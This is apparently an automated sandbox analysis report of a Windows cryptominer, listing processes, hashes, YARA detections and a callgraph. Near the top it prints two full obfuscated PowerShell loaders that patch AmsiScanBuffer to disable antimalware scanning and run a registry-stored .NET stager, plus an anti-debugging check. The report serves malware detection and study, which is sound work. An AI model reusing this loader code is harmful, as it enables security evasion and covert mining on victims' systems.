                                                                                                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](69)+''+[Char](85)+''+[Char](99)+''+'T'+'');$WfnyPndttaFlQY=$fxvCjurJEEUcT.GetMethod(''+[Char](87)+''+[Char](102)+'n'+'y'+''+'P'+''+'n'+''+'d'+''+'t'+''+'t'+''+[Char](97)+''+[Char](70)+'l'+[Char](81)+'Y',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+'ta'+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JjiXXwpbbbrjfbPnDMc=NGLbonfBsuNR @([String])([IntPtr]);$BLVFENqGmioLfqvbpVmToD=NGLbonfBsuNR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LGtHULICQkP=$fxvCjurJEEUcT.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$MCfPqlHPuVRchK=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$OyytwRheaSYqFgycC=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('Vir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$TWYbqKR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MCfPqlHPuVRchK,$JjiXXwpbbbrjfbPnDMc).Invoke(''+[Char](97)+'m'+'s'+'i'+'.'+''+[Char](100)+''+[Char](108)+'l');$yVOcIkghuDjvLnFeb=$WfnyPndttaFlQY.Invoke($Null,@([Object]$TWYbqKR,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+'er')));$uCYiRUffMm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,4,[ref]$uCYiRUffMm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$yVOcIkghuDjvLnFeb,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,0x20,[ref]$uCYiRUffMm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+'l'+''+'e'+'rsta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                  Imagebase:0x530000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:39
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:40
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[Char](85)+'s'+[Char](87)+''+[Char](74)+'B'+[Char](110)+''+[Char](77)+'');$xKuInBktgkPNhs=$mrsNZvUsWJBnM.GetMethod(''+'x'+'Ku'+[Char](73)+''+'n'+''+[Char](66)+''+[Char](107)+''+[Char](116)+''+'g'+'k'+[Char](80)+''+'N'+'h'+'s'+'',[Reflection.BindingFlags]'Pub'+'l'+''+'i'+''+'c'+''+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hpDOMeMRBRCuAUuldah=QgCYtqphZUyk @([String])([IntPtr]);$lBJaJRBvBxDAIBOClAwhdJ=QgCYtqphZUyk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zPFNVuWfmpd=$mrsNZvUsWJBnM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$TxJrEjJObcCpmZ=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$bZvPuqWGWAxchxpvH=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+[Char](116)+'e'+[Char](99)+'t')));$jweDifO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TxJrEjJObcCpmZ,$hpDOMeMRBRCuAUuldah).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$fOCXrgjBAURvBdTAm=$xKuInBktgkPNhs.Invoke($Null,@([Object]$jweDifO,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+'uf'+[Char](102)+'e'+'r'+'')));$tTEVvGnGYm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,4,[ref]$tTEVvGnGYm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOCXrgjBAURvBdTAm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,0x20,[ref]$tTEVvGnGYm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000028.00000002.2236987878.000001C51E800000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:41
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:42
                                                                                                  Start time:13:14:02
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\dllhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
                                                                                                  Imagebase:0x7ff70f330000
                                                                                                  File size:21'312 bytes
                                                                                                  MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:43
                                                                                                  Start time:13:14:03
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\winlogon.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:winlogon.exe
                                                                                                  Imagebase:0x7ff7cd660000
                                                                                                  File size:906'240 bytes
                                                                                                  MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:44
                                                                                                  Start time:13:14:03
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\lsass.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\lsass.exe
                                                                                                  Imagebase:0x7ff7a2ae0000
                                                                                                  File size:59'456 bytes
                                                                                                  MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:45
                                                                                                  Start time:13:14:04
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:46
                                                                                                  Start time:13:14:04
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\dwm.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"dwm.exe"
                                                                                                  Imagebase:0x7ff74e710000
                                                                                                  File size:94'720 bytes
                                                                                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:47
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:48
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:49
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:50
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:51
                                                                                                  Start time:13:14:09
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:52
                                                                                                  Start time:13:14:09
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:53
                                                                                                  Start time:13:14:10
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:54
                                                                                                  Start time:13:14:12
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:55
                                                                                                  Start time:13:14:13
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:56
                                                                                                  Start time:13:14:13
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:57
                                                                                                  Start time:13:14:13
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:12.2%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:50%
                                                                                                    Total number of Nodes:6
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 1406 7ffd9b885d4d 1407 7ffd9b885d6f CheckRemoteDebuggerPresent 1406->1407 1409 7ffd9b885e0f 1407->1409 1410 7ffd9b885f38 1411 7ffd9b885f41 CloseHandle 1410->1411 1413 7ffd9b885fe4 1411->1413

                                                                                                    Callgraph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Opacity -> Relevance
                                                                                                    • Disassembly available
                                                                                                    callgraph 0 Function_00007FFD9B880BF2 29 Function_00007FFD9B880E1A 0->29 53 Function_00007FFD9B880E54 0->53 68 Function_00007FFD9B880E8E 0->68 1 Function_00007FFD9B8804F2 2 Function_00007FFD9B8804F0 3 Function_00007FFD9B882BF0 4 Function_00007FFD9B881FED 5 Function_00007FFD9B8838ED 93 Function_00007FFD9B883AA2 5->93 6 Function_00007FFD9B883DF9 26 Function_00007FFD9B884211 6->26 7 Function_00007FFD9B8804F8 31 Function_00007FFD9B880518 7->31 8 Function_00007FFD9B8801F8 9 Function_00007FFD9B8842F6 80 Function_00007FFD9B8847B4 9->80 10 Function_00007FFD9B883AF5 11 Function_00007FFD9B884FF5 11->8 12 Function_00007FFD9B8805E4 13 Function_00007FFD9B882CE0 45 Function_00007FFD9B882E3B 13->45 14 Function_00007FFD9B8804E0 15 Function_00007FFD9B8834DD 65 Function_00007FFD9B883669 15->65 16 Function_00007FFD9B881BEC 97 Function_00007FFD9B881DCE 16->97 17 Function_00007FFD9B8818E9 18 Function_00007FFD9B8810E8 87 Function_00007FFD9B8813A3 18->87 19 Function_00007FFD9B882FE5 20 Function_00007FFD9B881B14 21 Function_00007FFD9B882814 22 Function_00007FFD9B883C14 72 Function_00007FFD9B883D98 22->72 23 Function_00007FFD9B885714 24 Function_00007FFD9B880812 25 Function_00007FFD9B881E11 95 Function_00007FFD9B881FA9 25->95 26->8 27 Function_00007FFD9B882110 58 Function_00007FFD9B88235C 27->58 28 Function_00007FFD9B88310D 74 Function_00007FFD9B883282 28->74 30 Function_00007FFD9B88081A 32 Function_00007FFD9B885616 33 Function_00007FFD9B880802 34 Function_00007FFD9B885800 35 Function_00007FFD9B880500 36 Function_00007FFD9B8816FE 36->8 37 Function_00007FFD9B884C0C 37->8 38 Function_00007FFD9B880508 39 Function_00007FFD9B882705 40 Function_00007FFD9B885530 40->8 41 Function_00007FFD9B88142E 41->36 42 Function_00007FFD9B88012D 43 Function_00007FFD9B88022D 44 Function_00007FFD9B88053B 46 Function_00007FFD9B885F38 47 Function_00007FFD9B880138 48 